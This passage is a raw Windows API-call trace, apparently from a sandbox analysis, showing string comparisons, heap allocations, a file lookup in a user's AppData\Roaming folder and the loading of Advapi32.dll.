[0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NikGKB3oJVJW2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ikGKB3oJVJW2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kGKB3oJVJW2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GKB3oJVJW2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KB3oJVJW2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B3oJVJW2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3oJVJW2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oJVJW2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JVJW2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VJW2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JW2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.295] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0207.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0207.295] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0207.295] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0207.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0207.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0207.295] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0207.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0207.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0207.296] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0207.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0207.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0207.296] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0207.296] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.296] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0207.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0207.296] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0207.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0207.296] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0207.296] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0207.297] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/ynNikGKB3oJVJW2VhiLE.ots", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8fec4c0, ftCreationTime.dwHighDateTime=0x1d4cbcc, ftLastAccessTime.dwLowDateTime=0xe923c630, ftLastAccessTime.dwHighDateTime=0x1d4d59b, ftLastWriteTime.dwLowDateTime=0xe923c630, ftLastWriteTime.dwHighDateTime=0x1d4d59b, nFileSizeHigh=0x0, nFileSizeLow=0xf044, dwReserved0=0x9d10039, dwReserved1=0x1b48b, cFileName="ynNikGKB3oJVJW2VhiLE.ots", cAlternateFileName="YNNIKG~1.OTS")) returned 0xaa5820 [0207.297] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0207.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0207.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.297] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0207.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0207.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0207.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0207.299] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0207.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0207.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0207.300] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0207.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.300] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0207.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.301] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.301] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.301] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0207.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.301] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0207.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.302] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.302] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.302] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.304] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0207.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0207.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0207.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0207.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0207.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.305] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0207.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.306] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.306] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.306] RtlAllocateHeap (HeapHandle=0x25c0000, 